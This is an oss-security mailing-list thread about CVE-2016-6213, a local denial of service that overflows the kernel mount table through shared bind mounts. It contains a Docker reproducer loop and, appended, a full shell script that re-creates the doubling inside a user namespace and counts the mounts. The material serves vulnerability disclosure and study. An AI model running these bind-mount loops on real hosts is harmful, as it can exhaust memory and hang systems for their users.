Date: Thu, 14 Jul 2016 12:15:02 -0400 (EDT)
From: CAI Qian <caiqian@...hat.com>
To: Greg KH <greg@...ah.com>
Cc: oss-security@...ts.openwall.com, cve-assign@...re.org
Subject: Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount

Maybe this is a better reproducer using docker. It is exploitable even with user namespace enabled.

# docker run -it -v /mnt/:/mnt/:shared --cap-add=SYS_ADMIN rhel7 /bin/bash
# cat /proc/self/uid_map
         0        995      65536
# cat /proc/self/gid_map
         0        992      65536

(inside container)
# for i in `seq 1 20`; do mount -o bind /mnt/1 /mnt/2; done

CAI Qian

----- Original Message -----
> From: "Greg KH" <greg@...ah.com>
> To: oss-security@...ts.openwall.com
> Cc: caiqian@...hat.com, cve-assign@...re.org
> Sent: Wednesday, July 13, 2016 6:45:00 PM
> Subject: Re: [oss-security] Re: cve request: local DoS by overflowing kernel mount table using shared bind mount
>
> On Wed, Jul 13, 2016 at 12:59:40PM -0400, cve-assign@...re.org wrote:
> > > It was reported that the mount table expands by a power-of-two
> > > with each bind mount command.
> >
> > > If the system is configured in the way that a non-root user
> > > allows bind mount even if with limit number of bind mount
> > > allowed, a non-root user could cause a local DoS by quickly
> > > overflow the mount table.
> >
> > > it will cause a deadlock for the whole system,
> >
> > >> form of unlimited memory consumption that is causing the problem
> >
> > Use CVE-2016-6213.
>
> A CVE for an "improperly configured system"? Huh? What distro has such
> a configuration set by default? This isn't a kernel bug, so what is
> this CVE classified as being "against"? It better not be against the
> Linux kernel...
>
> confused,
>
> greg k-h
>
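The reproducer above needs CAP_SYS_ADMIN and a shared mount, which is what the Docker flags supply. The following script is an added example, not part of the thread and not CAI Qian's or Greg's code: it recreates the same loop inside a throwaway user+mount namespace so it can be run as an unprivileged user without touching the host's mount table, and it prints the mount count after every bind so the "power-of-two" growth in the report is visible. It assumes util-linux `unshare -Urm` and `mount`, and a kernel that allows unprivileged user namespaces; the file name `bindgrow.sh` and the `BINDGROW_INNER` variable are this example's own choices. The `fs.mount-max` sysctl it reports is the per-namespace cap added in Linux 4.9 as the fix for this report; older kernels have no cap at all.

```shell
#!/bin/sh
# Added example (not from the mailing-list post): reproduce the shared-bind-mount
# growth in a throwaway user+mount namespace and print the mount count after
# every bind. Assumes util-linux unshare(1) and mount(8) and a kernel that lets
# an unprivileged user create user namespaces. Nothing here touches the host's
# mount table, and every mount made inside vanishes when the inner shell exits.

# Number of mount entries in a mountinfo file; defaults to the caller's own table.
count_mounts() {
    wc -l < "${1:-/proc/self/mountinfo}" | tr -d ' '
}

# Per-namespace mount cap, or "unlimited" on kernels older than 4.9 (the
# fs.mount-max sysctl is the limit that went in as the fix for this report).
mount_cap() {
    if [ -r /proc/sys/fs/mount-max ]; then
        cat /proc/sys/fs/mount-max
    else
        echo unlimited
    fi
}

# Inner part, already running inside the fresh namespace. $1 = number of binds.
# A private tmpfs is put over /tmp first so no directory is left on the host,
# then /tmp is made a shared mount: propagation is what turns "one more bind"
# into "one more copy on every existing peer", i.e. a doubling per iteration.
grow() {
    n=$1
    before=$(count_mounts)
    mount -t tmpfs none /tmp
    mount --make-shared /tmp
    mkdir /tmp/1 /tmp/2
    i=1
    while [ "$i" -le "$n" ]; do
        if ! mount --bind /tmp/1 /tmp/2; then
            echo "bind $i failed (fs.mount-max reached?)"
            break
        fi
        echo "after bind $i: $(( $(count_mounts) - before )) mounts under /tmp"
        i=$((i + 1))
    done
}

# Outer part: report the cap, then re-run this file inside unshare -Urm, which
# maps the caller to uid 0 in a new user namespace and gives it its own private
# mount namespace. Usage: sh bindgrow.sh 8
main() {
    n=$1
    if [ "${BINDGROW_INNER:-}" != 1 ]; then
        echo "fs.mount-max: $(mount_cap)"
        export BINDGROW_INNER=1
        exec unshare -Urm sh "$0" "$n"
    fi
    grow "$n"
}

# Only act when invoked with an iteration count, so sourcing the file is harmless.
[ $# -gt 0 ] && main "$1"
```

Run as `sh bindgrow.sh 8`: the count under /tmp should double on every bind (2, 4, 8, ... 256 after eight binds), which is why the report's twenty iterations are enough to exhaust memory on a kernel without the cap. On a 4.9 or later kernel with the default `fs.mount-max` of 100000, `sh bindgrow.sh 20` instead stops partway with a failed bind once the cap is hit, which is the intended fix behaviour. The loop is exactly the one in the report; only the namespace wrapper and the counting are added.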